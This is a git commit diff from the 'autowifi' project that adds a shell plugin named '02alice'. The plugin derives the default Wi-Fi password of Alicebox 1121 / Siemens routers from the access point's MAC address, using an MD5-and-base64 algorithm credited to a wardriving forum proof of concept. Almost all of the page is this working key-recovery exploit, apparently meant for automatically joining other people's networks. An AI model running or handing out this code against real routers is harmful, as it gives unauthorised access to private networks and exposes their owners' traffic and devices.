diff options
author | makefu <github@syntax-fehler.de> | 2013-06-26 13:26:56 +0200 |
---|---|---|
committer | makefu <github@syntax-fehler.de> | 2013-06-26 13:26:56 +0200 |
commit | ae52241d3802079628a87a534ce1853d1d46c82a (patch) | |
tree | 9b37886b3ce86da81febfe3594c8a31b5694870f /usr/lib/autowifi/plugins/02alice | |
parent | 410ddbd1f77e2f65de6e6b6c86daf031e296028d (diff) | |
parent | a0f4644017949e17b45f23a3870afa6f6c2823cb (diff) |
Merge branch 'master' of github.com:krebscode/autowifi
Diffstat (limited to 'usr/lib/autowifi/plugins/02alice')
-rwxr-xr-x | usr/lib/autowifi/plugins/02alice | 20 |
1 files changed, 20 insertions, 0 deletions
diff --git a/usr/lib/autowifi/plugins/02alice b/usr/lib/autowifi/plugins/02alice new file mode 100755 index 00000000..1b4533a4 --- /dev/null +++ b/usr/lib/autowifi/plugins/02alice @@ -0,0 +1,20 @@ +#!/bin/sh +# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm: +# Based on Poc from +# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html +# +# +# ESSID MAC CHANNEL ENCRYPTION + +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core + +parse_plugin_args "$@" + +! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1 + +# printf always makes string to lower, need that for correct md5sum +ETHMAC=$( printf "%012x" $((0x${MAC}-1)) ) +TMP=$(printf $ETHMAC | md5sum) +printf ${TMP:0:12} | base64 +exit 0 |